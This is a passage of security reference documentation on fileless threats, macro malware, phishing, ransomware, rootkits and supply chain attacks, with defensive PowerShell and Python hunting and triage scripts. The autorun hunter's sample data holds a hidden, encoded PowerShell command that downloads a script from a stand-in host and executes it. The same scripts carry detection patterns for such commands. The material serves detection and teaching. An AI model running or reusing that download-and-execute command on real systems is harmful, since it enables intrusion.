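    # separately as well, because writing there needs only standard user rights.
    $roots = @('Registry::HKEY_CLASSES_ROOT', 'Registry::HKEY_CURRENT_USER\Software\Classes')
    foreach ($root in $roots) {
        foreach ($key in (Get-ChildItem -Path $root -ErrorAction SilentlyContinue |
                          Where-Object { $_.PSChildName -like '.*' })) {
            $ext = $key.PSChildName
            $oddExt = ($ext.Length -gt 6) -and ($ext -match '\d{3,}')
            $progId = (Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue).'(default)'
            # The handler can hang directly off the extension key or off its ProgId.
            $command = Get-OpenCommand -KeyPath "$root\$ext"
            if (-not $command -and $progId) { $command = Get-OpenCommand -KeyPath "$root\$progId" }
            if ($command -and ($command -match "(?i)$ScriptHosts")) {
                [pscustomobject]@{ Hive = $root; Extension = $ext; ProgId = $progId
                                   Command = $command; OddExtension = $oddExt }
            }
        }
    }
}

function Get-SuspiciousRunEntries {
    $runKeys = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run')
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are not values
            $value = [string]$p.Value
            # A Run value that just names a file with a hex-looking extension executes only
            # through the shell verb handler; a direct script-host call is the other form.
            if ($value -match '\.[0-9a-fA-F]{6,}\b' -or $value -match "(?i)$ScriptHosts") {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Value = $value }
            }
        }
    }
}

Get-SuspiciousShellVerbs | Where-Object OddExtension | Format-Table -AutoSize
Get-SuspiciousRunEntries | Format-Table -AutoSize
```

A hit in both lists that share the same random extension is the Kovter pattern; the file the Run entry points to will contain junk, and the real payload is the script referenced from the handler's command line and the registry value it reads.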

Categorizing fileless threats by infection host


Having described the broad categories, we can now dig into the details and provide a breakdown of the infection
hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It
drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure
malware does not get the upper hand in the arms race.
Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the operating system, the
browser, the Java engine, the Flash engine, etc. in order to execute shellcode and deliver a payload in memory.
While the payload is fileless, the initial entry vector is a file.
Network-based (Type I): A network communication that takes advantage of a vulnerability in the target machine
can achieve code execution in the context of an application or the kernel. An example is WannaCry, which exploits
a previously fixed vulnerability in the Windows SMBv1 implementation (CVE-2017-0144, patched by MS17-010
before the outbreak) to deliver a backdoor within the kernel memory.
Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network cards require chipsets and
dedicated software to function. Software that resides in and runs on the chipset of a device is called firmware.
Although a complex task, the firmware can be infected by malware, as the Equation espionage group has been
caught doing.
CPU-based (Type I): Modern CPUs and their platforms are extremely complex and include subsystems running
firmware for management purposes. Such firmware may be vulnerable to hijacking and allow the execution of
malicious code that operates beneath the operating system. In December 2017, two researchers reported a
vulnerability that can allow attackers to execute code inside the Management Engine (ME) present in the chipset of
modern Intel platforms. Meanwhile, the attacker group PLATINUM has been observed to have the capability to use
Intel's Active Management Technology (AMT) to perform invisible network communications bypassing the installed
operating system. ME and AMT are essentially autonomous micro-computers that live in the platform chipset and
operate at a very low level. Because these technologies' purpose is to provide remote manageability, they have
direct access to hardware, are independent of the operating system, and can run even if the computer is turned
off. Besides being vulnerable at the firmware level, CPUs could be manufactured with backdoors inserted directly in
the hardware circuitry. This attack has been researched and proved possible in the past. Just recently it has been
reported that certain models of x86 processors contain a secondary embedded RISC-like CPU core that can
effectively provide a backdoor through which regular applications can gain privileged execution.
USB-based (Type I): USB devices of all kinds can be reprogrammed with malicious firmware capable of
interacting with the operating system in nefarious ways. This is the case of the BadUSB technique, demonstrated
a few years ago, which allows a reprogrammed USB stick to act as a keyboard that sends commands to machines
via keystrokes, or as a network card that can redirect traffic at will.
BIOS-based (Type I): The BIOS is firmware stored in a chip on the system board. It executes when a machine is
powered on, initializes the hardware, and then transfers control to the boot sector. It's a very important
component that operates at a very low level and executes before the boot sector. It's possible to reprogram the
BIOS firmware with malicious code, as has happened in the past with the Mebromi rootkit.
Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing the operating system to
create robust virtual machines. A virtual machine runs in a confined, simulated environment, and is in theory
unaware of the emulation. A malware taking over a machine may implement a small hypervisor in order to hide
itself outside of the realm of the running operating system. Malware of this kind has been theorized in the past, and
eventually real hypervisor rootkits have been observed, although very few are known to date.
Execution and injection
File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard execution vector. A simple
executable can be launched as a first-stage malware to run an additional payload in memory or inject it into other
legitimate running processes.
Macro-based (Type III: Office documents): The VBA language is a flexible and powerful tool designed to automate
editing tasks and add dynamic functionality to documents. As such, it can be abused by attackers to carry out
malicious operations like decoding, running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG. Macros are executed within the context of an Office process (e.g.,
Winword.exe), and they’re implemented in a scripting language, so there is no binary executable that an antivirus
can inspect. While Office apps require explicit consent from the user to execute macros from a document, attackers
use social engineering techniques to trick users into allowing macros to execute.
Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and PowerShell scripting
languages are available by default on Windows platforms. Scripts have the same advantages as macros: they’re
textual files (not binary executables) and they run within the context of the interpreter (e.g., wscript.exe,
powershell.exe, etc.), which is a clean and legitimate component. Scripts are very versatile; they can be run from a
file (e.g., by double-clicking them) or, in some cases, executed directly on the command line of an interpreter. Being
able to run on the command line allows malware to persist as encoded command-line scripts: as auto-start
services, inside autorun registry keys, or as WMI event subscriptions stored in the WMI repository. Furthermore, an
attacker who has gained access to an infected machine may simply type the script at the command prompt.
Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume and contains executable
code required to start the boot process of the operating system. Threats like Petya are capable of infecting the Boot
Record by overwriting it with malicious code, so that when the machine is booted the malware immediately gains
control (and in the case of Petya, with disastrous consequences). The Boot Record resides outside the file system,
but it’s accessible by the operating system, and modern antivirus products have the capability to scan and restore it.
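The script-based entry above describes persistence through autorun registry keys, auto-start services and WMI event subscriptions that launch an interpreter with an encoded command line. The following is an added hunting example, not Microsoft's code and not part of this article: it takes autostart entries of the shape an analyst would collect from Run keys, scheduled tasks or WMI CommandLineEventConsumer objects (all sample entries below are constructed, including the registry paths and the benign `sync.exe`), flags launches of script interpreters that also show a hidden window, an encoded command line, or a script living in a user-writable directory, and decodes PowerShell's `-EncodedCommand` argument (Base64 of UTF-16LE text) so the analyst can read what would run.

```python
"""Hunt autostart entries for script-interpreter launches (fileless persistence).

Added example, not Microsoft's code. Input is a constructed list of
(location, command) pairs of the kind collected from Run keys,
scheduled tasks and WMI CommandLineEventConsumer objects.
"""
import base64
import ntpath
import re
from typing import List, Optional

INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(temp|appdata|public|downloads)\\", re.IGNORECASE)
# Markers that, inside a decoded payload, indicate download-and-evaluate behaviour
EVAL_MARKERS = re.compile(r"\b(iex|invoke-expression|downloadstring|frombase64string)\b", re.IGNORECASE)


def decode_encoded_command(arg: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries Base64 of UTF-16LE text; None if not decodable."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def split_command(command: str) -> List[str]:
    """Split a Windows command line, keeping a quoted program path as one token."""
    command = command.strip()
    if command.startswith('"') and '"' in command[1:]:
        end = command.index('"', 1)
        return [command[1:end]] + command[end + 1:].split()
    return command.split()


def analyze_autorun(location: str, command: str) -> dict:
    """Return a finding dict; 'suspicious' needs an interpreter plus one more signal."""
    tokens = split_command(command)
    exe = ntpath.basename(tokens[0]).lower() if tokens else ""
    finding = {"location": location, "interpreter": exe, "reasons": [],
               "decoded": None, "suspicious": False}
    if exe not in INTERPRETERS:
        return finding
    args = tokens[1:]
    lowered = [a.lower() for a in args]
    if USER_WRITABLE.search(command):
        finding["reasons"].append("script in user-writable location")
    if "hidden" in lowered and any(a in ("-w", "-windowstyle") for a in lowered):
        finding["reasons"].append("hidden window")
    for i, arg in enumerate(lowered):
        if ENCODED_FLAG.match(arg) and i + 1 < len(args):
            finding["reasons"].append("encoded command line")
            decoded = decode_encoded_command(args[i + 1])
            finding["decoded"] = decoded
            if decoded and EVAL_MARKERS.search(decoded):
                finding["reasons"].append("download/eval in decoded payload")
    finding["suspicious"] = bool(finding["reasons"])
    return finding


def hunt_autoruns(entries) -> List[dict]:
    return [analyze_autorun(location, command) for location, command in entries]


def _encode_ps(script: str) -> str:
    """Constructed helper to build a sample -EncodedCommand argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample entries (paths, names and URL are invented for the example)
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorSync",
     r'"C:\Program Files\Vendor\sync.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "powershell.exe -NoP -W Hidden -enc "
     + _encode_ps("(New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1') | IEX")),
    ("WMI:CommandLineEventConsumer/Maint",
     r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\maint.vbs"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Inventory",
     r"powershell.exe -File C:\Program Files\IT\inventory.ps1"),
]

if __name__ == "__main__":
    for result in hunt_autoruns(SAMPLE_ENTRIES):
        if result["suspicious"]:
            print(result["location"], "->", ", ".join(result["reasons"]))
```

An interpreter in an autostart location on its own (the last sample entry) is recorded but not marked suspicious, because administrators legitimately schedule PowerShell scripts; the combination with a hidden window, an encoded payload, or a script under a user-writable path is what warrants a look.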

Defeating fileless malware


At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that
continuously enhance Windows security and mitigate classes of threats. We instrument durable protections that
are effective against a wide range of threats. Through the Antimalware Scan Interface (AMSI), behavior monitoring,
memory scanning, and boot sector protection, Windows Defender Advanced Threat Protection (Windows
Defender ATP) can inspect fileless threats even with heavy obfuscation. Machine learning technologies in the cloud
allow us to scale these protections against new and emerging threats.
To learn more, read: Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and
next-gen AV
Macro malware
4/8/2019 • 2 minutes to read

Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive.
However, macro malware uses this functionality to infect your device.

How macro malware works


Macro malware hides in Microsoft Office files and is delivered as email attachments or inside ZIP files. These files
use names that are intended to entice or scare people into opening them. They often look like invoices, receipts,
legal documents, and more.
Macro malware was fairly common several years ago because macros ran automatically whenever a document
was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware
authors need to convince users to turn on macros so that their malware can run. They do this by showing fake
warnings when a malicious document is opened.
We've seen macro malware download threats from the following families:
Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue
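Because macro malware arrives as Office attachments, a mail gateway or triage script can tell whether an attachment actually carries a VBA project before a user ever sees the lure. The check below is an added example, not Microsoft's code or part of this article: modern Office documents are ZIP containers, and a macro project is stored as `word/vbaProject.bin`, `xl/vbaProject.bin` or `ppt/vbaProject.bin`, so listing the container's entries is enough to detect one. The sample documents are constructed in memory; `should_quarantine` is an assumed policy hook, not a product setting.

```python
"""Flag Office attachments that carry VBA macro projects.

Added example (not Microsoft's code). Sample documents are constructed
in memory; real files would come from the mail pipeline.
"""
import io
import zipfile

MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
# Extensions that are not supposed to carry macros at all
MACRO_FREE_EXTS = {".docx", ".xlsx", ".pptx"}


def inspect_office_attachment(name: str, data: bytes) -> dict:
    """Return {'name', 'is_ooxml', 'has_macros', 'mismatch'} for one attachment."""
    result = {"name": name, "is_ooxml": False, "has_macros": False, "mismatch": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result  # legacy .doc/.xls (OLE2) or non-Office data: not handled here
    with zipfile.ZipFile(io.BytesIO(data)) as container:
        entries = set(container.namelist())
    result["is_ooxml"] = "[Content_Types].xml" in entries
    result["has_macros"] = any(part in entries for part in MACRO_PARTS)
    ext = name[name.rfind("."):].lower() if "." in name else ""
    # A macro project inside a file whose extension claims to be macro-free
    result["mismatch"] = result["has_macros"] and ext in MACRO_FREE_EXTS
    return result


def should_quarantine(name: str, data: bytes) -> bool:
    """Assumed policy: hold any attachment with a VBA project for review."""
    verdict = inspect_office_attachment(name, data)
    return verdict["has_macros"] or verdict["mismatch"]


def build_sample(parts: dict) -> bytes:
    """Constructed helper: a minimal OOXML-like ZIP with the given parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as container:
        container.writestr("[Content_Types].xml", "<Types/>")
        for path, content in parts.items():
            container.writestr(path, content)
    return buf.getvalue()


CLEAN_DOCX = build_sample({"word/document.xml": "<w:document/>"})
MACRO_DOCM = build_sample({"word/document.xml": "<w:document/>",
                           "word/vbaProject.bin": b"\xd0\xcf\x11\xe0constructed"})

if __name__ == "__main__":
    for filename, blob in (("report.docx", CLEAN_DOCX), ("invoice.docm", MACRO_DOCM),
                           ("invoice.docx", MACRO_DOCM)):
        print(filename, inspect_office_attachment(filename, blob))
```

Legacy binary formats (.doc, .xls) are OLE2 compound files rather than ZIP containers, so this check returns `is_ooxml: False` for them and a separate OLE parser is needed to inspect their macro streams.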

How to protect against macro malware


Make sure macros are disabled in your Microsoft Office applications. In enterprises, IT admins set the
default setting for macros:
Enable or disable macros in Office documents
Don’t open suspicious emails or suspicious attachments.
Delete any emails from unknown people or with suspicious content. Spam emails are the main way macro
malware spreads.
Enterprises can prevent macro malware from running executable content by using attack surface reduction (ASR) rules.
For more general tips, see prevent malware infection.
Phishing
4/8/2019 • 9 minutes to read

Phishing attacks attempt to steal sensitive information through emails, websites, text messages, or other forms of
electronic communication that often look to be official communication from legitimate companies or individuals.
The information that phishers (as the cybercriminals behind phishing attacks are called) attempt to steal can be
user names and passwords, credit card details, bank account information, or other credentials. Attackers can then
use stolen information for malicious purposes, such as hacking, identity theft, or stealing money directly from bank
accounts and credit cards. Phishers can also sell the information in cybercriminal underground marketplaces.

How phishing works


Phishing attacks are scams that often use social engineering bait or lure content. For example, during tax season,
bait content involves tax-filing announcements that attempt to lure you into providing your personal information
such as your Social Security number or bank account information.
Legitimate-looking communication, usually email, that links to a phishing site is one of the most common methods
used in phishing attacks. The phishing site typically mimics sign-in pages that require users to input login
credentials and account information. The phishing site then captures the sensitive information as soon as the user
provides it, giving attackers access to the information.
Another common phishing technique is the use of emails that direct you to open a malicious attachment, for
example a PDF file. The attachment often contains a message asking you to provide login credentials to another
site such as email or file sharing websites to open the document. When you access these phishing sites using your
login credentials, the attacker now has access to your information and can gain additional personal information
about you.

Phishing trends and techniques


Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an outstanding invoice from a
known vendor or company and provides a link for you to access and pay your invoice. When you access the site,
the attacker is poised to steal your personal information and funds.
Payment/delivery scam
You are asked to provide a credit card or other personal information so that your payment information can be
updated with a commonly known vendor or supplier. The update is requested so that you can take delivery of your
ordered goods. Generally, you may be familiar with the company and have likely done business with them in the
past, but you are not aware of any items you have recently purchased from them.
Tax-themed phishing scams
A common IRS phishing scam is one in which an urgent email letter is sent indicating that you owe money to the
IRS. Often the email threatens legal action if you do not access the site in a timely manner and pay your taxes.
When you access the site, the attackers can steal your personal credit card or bank information and drain your
accounts.
Downloads
Another frequently used phishing scam is one in which an attacker sends a fraudulent email requesting you to
open or download a document, often one requiring you to sign in.
Phishing emails that deliver other threats
Phishing emails can be very effective, and so attackers use them to distribute ransomware through links or
attachments in emails. When run, the ransomware encrypts files and displays a ransom note, which asks you to
pay a sum of money to regain access to your files.
We have also seen phishing emails that have links to tech support scam websites, which use various scare tactics
to trick you into calling hotlines and paying for unnecessary "technical support services" that supposedly fix
contrived device, platform, or software problems.

Targeted attacks against enterprises


Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure content. To perform spear
phishing, attackers will typically do reconnaissance work, surveying social media and other information sources
about their intended target.
Spear phishing may involve tricking you into logging into fake sites and divulging credentials. Spear phishing may
also be designed to lure you into opening documents by clicking on links that automatically install malware. With
this malware in place, attackers can remotely manipulate the infected computer.
The implanted malware serves as the point of entry for a more sophisticated attack known as an advanced
persistent threat (APT). APTs are generally designed to establish control and steal data over extended periods. As
part of the attack, attackers often try to deploy more covert hacking tools, move laterally to other computers,
compromise or create privileged accounts, and regularly exfiltrate information from compromised networks.
Whaling
Whaling is a form of phishing in which the attack is directed at high-level or senior executives within specific
companies with the direct goal of gaining access to their credentials and/or bank information. The content of the
email may be written as a legal subpoena, customer complaint, or other executive issue. This type of attack can
also lead to an APT attack within an organization. When the links or attachment are opened, it can assist the
attacker in accessing credentials and other personal information, or launch a malware that will lead to an APT.
Business email compromise
Business email compromise (BEC) is a sophisticated scam that targets businesses often working with foreign
suppliers and businesses that regularly perform wire transfer payments. One of the most common schemes used
by BEC attackers involves gaining access to a company’s network through a spear phishing attack, where the
attacker creates a domain similar to the company they are targeting or spoofs their email to scam users into
releasing personal account information for money transfers.

How to protect against phishing attacks


Social engineering attacks are designed to take advantage of a user's possible lapse in decision-making. Be aware
and never provide sensitive or personal information through email or unknown websites, or over the phone.
Remember, phishing emails are designed to appear legitimate.
Awareness
The best protection is awareness and education. Don’t open attachments or click links in unsolicited emails, even if
the emails came from a recognized source. If the email is unexpected, be wary about opening the attachment and
verify the URL.
Enterprises should educate and train their employees to be wary of any communication that requests personal or
financial information, and instruct them to report the threat to the company’s security operations team
immediately.
Here are several telltale signs of a phishing scam:
The links or URLs provided in emails are not pointing to the correct location or are attempting to have
you access a third-party site that is not affiliated with the sender of the email. For example, in the image
below the URL provided does not match the URL that you will be taken to.

There is a request for personal information such as social security numbers or bank or financial
information. Official communications won't generally request personal information from you in the form of
an email.
The sender's email address is altered so that it looks similar to a legitimate email address but
has added numbers or changed letters.
The message is unexpected and unsolicited. If you suddenly receive an email from an entity or a person
you rarely deal with, consider this email suspect.
The message or the attachment asks you to enable macros, adjust security settings, or install
applications. Normal emails will not ask you to do this.
The message contains errors. Legitimate corporate messages are less likely to have typographic or
grammatical errors or contain wrong information.
The sender address does not match the signature on the message itself. For example, an email is
purported to be from Mary of Contoso Corp, but the sender address is [email protected].
There are multiple recipients in the “To” field and they appear to be random addresses. Corporate
messages are normally sent directly to individual recipients.
The greeting on the message itself does not personally address you. Apart from messages that
mistakenly address a different person, those that misuse your name or pull your name directly from your
email address tend to be malicious.
The website looks familiar but there are inconsistencies or things that are not quite right, such as
outdated logos, typos, or requests for additional information that legitimate sign-in websites do not
ask for.
The page that opens is not a live page but rather an image that is designed to look like the site you are
familiar with. A pop-up may appear that requests credentials.
If in doubt, contact the business by known channels to verify if any suspicious emails are in fact legitimate.
For more information, download and read this Microsoft e-book on preventing social engineering attacks,
especially in enterprise environments.
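Several of the telltale signs above can be checked mechanically at a mail gateway or in a triage tool: a link whose visible text names one site while its href points elsewhere, a sender domain that imitates a known one with added digits or changed letters, a display name that claims an organization the address does not belong to, and a long list of unrelated recipients. The script below is an added example, not Microsoft's code and not part of this article. `TRUSTED_DOMAINS` is an assumed allow-list of senders your organization knows (it uses contoso.com, Microsoft's fictional company name already mentioned above); both sample messages, the `example.org` recipients and the `example.invalid` link target are constructed.

```python
"""Score a message against telltale phishing signs.

Added example (not Microsoft's code). TRUSTED_DOMAINS, the sample
messages and every address in them are constructed.
"""
import email
from email import policy
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"contoso.com"}  # constructed allow-list of known sender domains
MAX_RECIPIENTS = 5                 # assumed threshold for "random addresses in To"


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot domains with changed letters."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domain(domain: str) -> Optional[str]:
    """Return the trusted domain this one imitates (added digits or 1-2 edits), else None."""
    for trusted in TRUSTED_DOMAINS:
        if domain == trusted:
            return None
        without_digits = "".join(c for c in domain if not c.isdigit())
        if without_digits == trusted or levenshtein(domain, trusted) <= 2:
            return trusted
    return None


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, ""

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), ""

    def handle_data(self, data):
        if self._href is not None:
            self._text += data

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._text.strip(), self._href))
            self._href = None


def host_of(text: str) -> str:
    """Hostname of a URL or of bare text like 'www.contoso.com/login'."""
    if "://" not in text:
        text = "http://" + text
    return (urlparse(text).hostname or "").lower()


def phishing_indicators(raw: bytes) -> List[str]:
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    from_header = msg["From"]
    sender = from_header.addresses[0] if from_header and from_header.addresses else None
    name = sender.display_name.lower() if sender else ""
    domain = sender.domain.lower() if sender else ""
    imitated = lookalike_domain(domain)
    if imitated:
        findings.append(f"sender domain {domain} looks like {imitated}")
    for trusted in TRUSTED_DOMAINS:  # display name claims a brand the address lacks
        brand = trusted.split(".")[0]
        if brand in name and domain != trusted:
            findings.append(f"display name claims {brand} but address is {sender.addr_spec}")
    to_header = msg["To"]
    recipients = len(to_header.addresses) if to_header else 0
    if recipients > MAX_RECIPIENTS:
        findings.append(f"{recipients} recipients in To")
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = LinkCollector()
        collector.feed(body.get_content())
        for text, href in collector.links:
            if "." in text and host_of(text) != host_of(href):
                findings.append(f"link text {text!r} actually points to {host_of(href)}")
    return findings


SAMPLE_EMAIL = b"""From: "Mary Jones, Contoso Corp" <mary.jones@c0ntoso.com>
To: a@example.org, b@example.org, c@example.org, d@example.org, e@example.org, f@example.org
Subject: Overdue invoice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Pay now at <a href="http://login.example.invalid/x">www.contoso.com/invoices</a></p></body></html>
"""

CLEAN_EMAIL = b"""From: "Mary Jones" <mary.jones@contoso.com>
To: a@example.org
Subject: Invoice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Your <a href="https://www.contoso.com/invoices/1">invoice</a> is ready.</p></body></html>
"""

if __name__ == "__main__":
    print("\n".join(phishing_indicators(SAMPLE_EMAIL)) or "no indicators")
```

The link check compares hostnames literally, so `www.contoso.com` against `login.contoso.com` would also be reported; comparing registrable domains instead is a reasonable refinement for production use.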
Software solutions for organizations
Microsoft Edge and Windows Defender Application Guard offer protection from the increasing threat of
targeted attacks using Microsoft's industry leading Hyper-V virtualization technology. If a browsed website
is deemed untrusted, the Hyper-V container will isolate that device from the rest of your network thereby
preventing access to your enterprise data.
Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies. Using various layers of
filtering, EOP can provide different controls for spam filtering, such as bulk mail controls and international
spam, that will further enhance your protection services.
Use Office 365 Advanced Threat Protection (ATP) to help protect your email, files, and online storage
against malware. It offers holistic protection in Microsoft Teams, Word, Excel, PowerPoint, Visio, SharePoint
Online, and OneDrive for Business. By protecting against unsafe attachments and expanding protection
against malicious links, it complements the security features of Exchange Online Protection to provide
better zero-day protection.
For more tips and software solutions, see prevent malware infection.

What do I do if I've already been a victim of a phishing scam?


If you feel that you have been a victim of a phishing attack, contact your IT Admin. You should also immediately
change all passwords associated with the accounts, and report any fraudulent activity to your bank, credit card
company, etc.
Reporting spam
Submit phishing scam emails to Microsoft by sending an email with the scam as an attachment to:
[email protected]. For more information on submitting messages to Microsoft, see Submit spam,
non-spam, and phishing scam messages to Microsoft for analysis.
For Outlook and Outlook on the web users, use the Report Message Add-in for Microsoft Outlook. For
information about how to install and use this tool, see Enable the Report Message add-in.
Send an email with the phishing scam to The Anti-Phishing Working Group: [email protected]. The
group uses reports generated from emails sent to fight phishing scams and hackers. ISPs, security vendors,
financial institutions and law enforcement agencies are involved.

Where to find more information about phishing attacks


For information on the latest Phishing attacks, techniques, and trends, you can read these entries on the Windows
Security blog:
Phishers unleash simple but effective social engineering techniques using PDF attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing-like emails lead to tech support scam
Ransomware
4/8/2019 • 2 minutes to read

Ransomware is a type of malware that encrypts files and folders, preventing access to important files.
Ransomware attempts to extort money from victims by demanding payment, usually in the form of cryptocurrency, in
exchange for the decryption key. But cybercriminals won't always follow through and unlock the files they
encrypted.
The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack
vectors, makes older platforms especially susceptible to ransomware attacks.

How ransomware works


Most ransomware infections start with:
Email messages with attachments that try to install ransomware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install ransomware.
Once ransomware infects a device, it starts encrypting files, folders, and even entire hard drive partitions using
encryption algorithms like RSA or RC4.
Ransomware is one of the most lucrative revenue channels for cybercriminals, so malware authors continually
improve their malware code to better target enterprise environments. Ransomware-as-a-service is a cybercriminal
business model in which malware creators sell their ransomware and other services to cybercriminals, who then
operate the ransomware attacks. The business model also defines profit sharing between the malware creators,
ransomware operators, and other parties that may be involved. For cybercriminals, ransomware is a big business,
at the expense of individuals and businesses.
Examples
Sophisticated ransomware like Spora, WannaCrypt (also known as WannaCry), and Petya (also known as
NotPetya) spread to other computers via network shares or exploits.
Spora drops ransomware copies in network shares.
WannaCrypt exploits the Server Message Block (SMB) vulnerability CVE-2017-0144 (also called
EternalBlue) to infect other computers.
A Petya variant exploits the same vulnerability, in addition to CVE-2017-0145 (also known as
EternalRomance), and uses stolen credentials to move laterally across networks.
Older ransomware like Reveton locks screens instead of encrypting files. It displays a full-screen image and
then disables Task Manager. The files are safe, but they are effectively inaccessible. The image usually contains a
message claiming to be from law enforcement that says the computer has been used in illegal cybercriminal
activities and a fine needs to be paid. Because of this, Reveton is nicknamed "Police Trojan" or "Police ransomware".
Ransomware like Cerber and Locky search for and encrypt specific file types, typically document and media files.
When the encryption is complete, the malware leaves a ransom note using text, image, or an HTML file with
instructions to pay a ransom to recover files.
Bad Rabbit ransomware was discovered attempting to spread across networks using hardcoded usernames and
passwords in brute force attacks.
How to protect against ransomware
Organizations can be targeted specifically by attackers, or they can be caught in the wide net cast by cybercriminal
operations. Large organizations are high value targets and attackers can demand bigger ransoms.
We recommend:
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
Apply the latest updates to your operating systems and apps.
Educate your employees so they can identify social engineering and spear-phishing attacks.
Enable controlled folder access. It can stop ransomware from encrypting files and holding the files for ransom.
For more general tips, see prevent malware infection.
Rootkits
4/8/2019 • 2 minutes to read

Malware authors use rootkits to hide malware on your device, allowing malware to persist as long as possible. A
successful rootkit can potentially remain in place for years if it is undetected. During this time it will steal
information and resources.

How rootkits work


Rootkits intercept and change standard operating system processes. After a rootkit infects a device, you can’t trust
any information that device reports about itself.
For example, if you were to ask a device to list all of the programs that are running, the rootkit might stealthily
remove any programs it doesn’t want you to know about. Rootkits are all about hiding things. They want to hide
both themselves and their malicious activity on a device.
Many modern malware families use rootkits to try and avoid detection and removal, including:
Alureon
Cutwail
Datrahere (Zacinlo)
Rustock
Sinowal
Sirefef

How to protect against rootkits


Like any other type of malware, the best way to avoid rootkits is to prevent them from being installed in the first place.
Apply the latest updates to operating systems and apps.
Educate your employees so they can be wary of suspicious websites and emails.
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
For more general tips, see prevent malware infection.
What if I think I have a rootkit on my device?
Microsoft security software includes a number of technologies designed specifically to remove rootkits. If you think
you might have a rootkit on your device and your antimalware software isn’t detecting it, you might need an extra
tool that lets you boot to a known trusted environment.
Windows Defender Offline can be launched from Windows Security Center and has the latest anti-malware
updates from Microsoft. It’s designed to be used on devices that aren't working correctly due to a possible
malware infection.
System Guard in Windows 10 protects against rootkits and threats that impact system integrity.
What if I can’t remove a rootkit?
If the problem persists, we strongly recommend reinstalling the operating system and security software. You
should then restore your data from a backup.
Supply chain attacks
4/8/2019 • 2 minutes to read

Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to
access source code, build processes, or update mechanisms by infecting legitimate apps to distribute malware.

How supply chain attacks work


Attackers hunt for unsecure network protocols, unprotected server infrastructures, and unsafe coding practices.
They break in, change source code, and hide malware in build and update processes.
Because software is built and released by trusted vendors, these apps and updates are signed and certified. In
software supply chain attacks, vendors are likely unaware that their apps or updates are infected with malicious
code when they’re released to the public. The malicious code then runs with the same trust and permissions as the
app.
The number of potential victims is significant, given the popularity of some apps. A case occurred where a free file
compression app was poisoned and deployed to customers in a country where it was the top utility app.
Types of supply chain attacks
Compromised software build tools or update infrastructure
Stolen code-signing certificates, or malicious apps signed using the identity of the developer company
Compromised specialized code shipped into hardware or firmware components
Pre-installed malware on devices (cameras, USB, phones, etc.)
To learn more about supply chain attacks, read this blog post called attack inception: compromised supply chain
within a supply chain poses new risks.

How to protect against supply chain attacks


Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and remediate suspicious
activities.
